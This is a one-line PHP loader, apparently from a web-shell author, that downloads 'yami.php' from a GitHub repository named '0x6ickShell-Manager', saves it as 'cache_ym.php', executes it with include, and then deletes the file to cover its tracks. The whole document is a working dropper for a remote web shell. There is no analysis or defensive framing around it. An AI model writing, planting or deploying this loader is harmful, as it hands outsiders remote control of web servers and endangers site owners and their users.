/*loader by 0x6ick - 0x6ick.my.id*/$tmp = 'cache_ym.php';$url = 'https://raw.githubusercontent.com/6ickzone/0x6ickShell-Manager/refs/heads/main/yami.php';if (!file_exists($tmp) || filesize($tmp) < 10) { $code = file_get_contents($url); file_put_contents($tmp, $code);}include($tmp);unlink($tmp);